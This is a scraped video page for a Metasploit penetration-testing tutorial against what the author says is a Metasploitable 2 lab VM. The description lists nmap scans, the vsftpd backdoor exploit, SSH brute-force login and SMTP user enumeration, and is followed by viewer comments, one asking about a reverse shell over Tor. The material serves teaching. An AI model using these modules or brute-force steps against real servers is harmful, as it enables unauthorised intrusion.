Servers penetration testing - Metasploit tutorial

  Рет қаралды 19,949

Nour's tech talk

Nour's tech talk

Күн бұрын

All the commands shown in the video are below.
In this video I’m going to cover the first steps into linux servers penetration testing. We are going to start with reconnaissance activities using nmap. Afterwards we will scan for vulnerabilities using nuclei. Lastly, I'm going to exploit FTP, SSH, SMTP, and DNS services on this machine using the metasploit framework.
Topics covered in this video:
VSFTPD vulnerability
SSH Brute forece login
SMTP Enumerate users.
SMTP Find server version.
DNS Kaminsky Attack.
DNS cache poisoning.
0:00 Intro
0:43 Reconnaissance
4:43 Vulnerability Scanning
5:25 Exploitation: FTP
8:07 Exploitation: SSH
10:03 Exploitation: SMTP
12:09 Exploitation: DNS
Code:
nmap 192.168.1.236 redirect open-tcp.txt
wc -l open-tcp.txt
nmap -p 0-65553192.168.1.236 redirect open-tcp.txt
wc -l open-tcp.txt
sudo nmap -sT 192.168.1.236 redirect open-tcp.txt
sudo nmap -sU -T5 192.168.1.236 redirect open-udp.txt
#FTP
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOST 192.168.1.236
run
#ssh
msfconsole
use auxiliary/scanner/ssh/ssh_login
set PASS_FILE passwords.txt
set USER_FILE usernames.txt
set RHOST 192.168.1.236
run
#smtp
msfconsole
use auxiliary/scanner/smtp/smtp_version
set RHOST 192.168.1.236
run
use auxiliary/scanner/smtp/smtp_enum
set RHOST 192.168.1.236
run
Sources:
www.infosecmatter.com/metaspl...
docs.rapid7.com/metasploit/me...
nuclei.projectdiscovery.io/
nmap.org/
Content:
Scan open ports with nmap.
Scan open TCP ports with nmap.
Scan open UDP ports nmap.
Scan server for vulnerabilities using nuclei.
Exploit FTP servers using metasploit.
VSFTPD Exploit
Exploit SSH servers using metasploit.
SSH Brute forece login
Exploit SMTP servers using metasploit.
SMTP Enumerate users.
SMTP Find server version.
Exploit DNS servers using metasploit.
DNS Kaminsky Attack.
DNS cache poisoning.
Metasploitable 2 tutorial
Metasploit framework tutorial

Пікірлер: 30
@efiita7554
@efiita7554 Жыл бұрын
i recently stumbled across your channel and ever since i've been hooked. keep up the good work bro. you are appreciated!
@qwerty74585
@qwerty74585 Жыл бұрын
I've been following your channel since 3 week ago. Keep up the good work man!
@shadrachwilson1211
@shadrachwilson1211 Жыл бұрын
Great content, I’m hooked this these videos. In-depth illustrations. Thank you for this
@astar3739
@astar3739 Жыл бұрын
Great content ❤️ Thank you for sharing your knowledge ...keep it up Bro 🙌
@TheJazzBlobb
@TheJazzBlobb Жыл бұрын
Great content.
@haxrov
@haxrov Жыл бұрын
Well done 👍
@babashehumodu1463
@babashehumodu1463 Жыл бұрын
Oh is very great, easily to understand, please next Advance 🙏
@TylerRake141
@TylerRake141 Жыл бұрын
I just came across your channel few days ago and since then have been binge watching your videos. I was wondering if you could make a video about web application architecture, web frameworks and how they run on web servers and you know just a detailed underlying concepts that would give us a better understanding when hacking one. Thank you!
@nourtechtalk
@nourtechtalk Жыл бұрын
Thank you Aftab! Yes, I'm going to diversify the content soon and there will be some web applications and cloud videos :)
@tanvir1322
@tanvir1322 Жыл бұрын
Useful methods...
@sssapss
@sssapss Жыл бұрын
And all this knowledge is free. Thnks
@jackl8545
@jackl8545 Жыл бұрын
I don't even care if you add ads to the download you're just such a goat
@nourtechtalk
@nourtechtalk Жыл бұрын
Which ads? 😅
@frontpage11111
@frontpage11111 Жыл бұрын
nice content
@Bhubaneswar_free_fire
@Bhubaneswar_free_fire Жыл бұрын
Op bro
@shafiqulsumon123
@shafiqulsumon123 Жыл бұрын
I am really amazed by the knowledge you are distributing among us. I would like to request you to help me with the CompTia Security+ course and CYSA+ course if it is possible please.
@Bhubaneswar_free_fire
@Bhubaneswar_free_fire Жыл бұрын
Thanks
@mohamadelsawi
@mohamadelsawi Жыл бұрын
الله ينور , احلي subscribe ليك , ربنا يبارك فيك
@missyou5085
@missyou5085 Жыл бұрын
hi sir windiws privilege escalation videos post it pls ... waiting you reply your clear explaion very usefull
@ni2be290
@ni2be290 Жыл бұрын
🙏🙏🙏🙏
@World_Newsupdates
@World_Newsupdates 2 ай бұрын
More Videos Plzz🥲
@hahahahaha525
@hahahahaha525 Жыл бұрын
Is it possible to have a reverse shell with vpn or Tor?
@TechUpdate-d26
@TechUpdate-d26 7 ай бұрын
Hello Sir, What server do you test on this video? Would you inform me please? Thank you
@Free.Education786
@Free.Education786 Жыл бұрын
Please make beginner to advance level practical live website hacking, live website bug hunting, live website penetration testing, live website exploitation content video series... 🙏 😊 💯✌❤💚💙💜😍😘🤝
@cvport8155
@cvport8155 Жыл бұрын
Please make vd for advanced red team hacking for pro
@ra1n792
@ra1n792 Жыл бұрын
When I ping the server ip it does not respond
@nourtechtalk
@nourtechtalk Жыл бұрын
You need to set it up first. Install metasploitable 2 and bridge the betwork of the vm so it will have a real IP on your router.
@gamingrampage2898
@gamingrampage2898 Жыл бұрын
Bro pls make a discord
@binoyjana4393
@binoyjana4393 Жыл бұрын
guilty, I feel like being honest here is going to be the most aningful.
Nmap Tutorial to find Network Vulnerabilities
17:09
NetworkChuck
Рет қаралды 2,7 МЛН
Nmap - FTP Enumeration
11:56
HackerSploit
Рет қаралды 35 М.
路飞被小孩吓到了#海贼王#路飞
00:41
路飞与唐舞桐
Рет қаралды 83 МЛН
39kgのガリガリが踊る絵文字ダンス/39kg boney emoji dance#dance #ダンス #にんげんっていいな
00:16
💀Skeleton Ninja🥷【にんげんっていいなチャンネル】
Рет қаралды 8 МЛН
Hacking 3 Different Servers Using Metasploit
12:55
Infosec Mastery - Ethical Hacking for Beginners
Рет қаралды 5 М.
How To Protect Your Linux Server From Hackers!
20:38
LiveOverflow
Рет қаралды 297 М.
NMAP Tutorial for Beginners! Network Attacks
15:51
Loi Liang Yang
Рет қаралды 91 М.
Metasploit
34:20
David Bombal
Рет қаралды 397 М.
Where People Go When They Want to Hack You
34:40
CyberNews
Рет қаралды 1,4 МЛН
How Hackers Write Malware & Evade Antivirus (Nim)
24:04
John Hammond
Рет қаралды 392 М.
SSH Keys
10:12
RobEdwards
Рет қаралды 106 М.
路飞被小孩吓到了#海贼王#路飞
00:41
路飞与唐舞桐
Рет қаралды 83 МЛН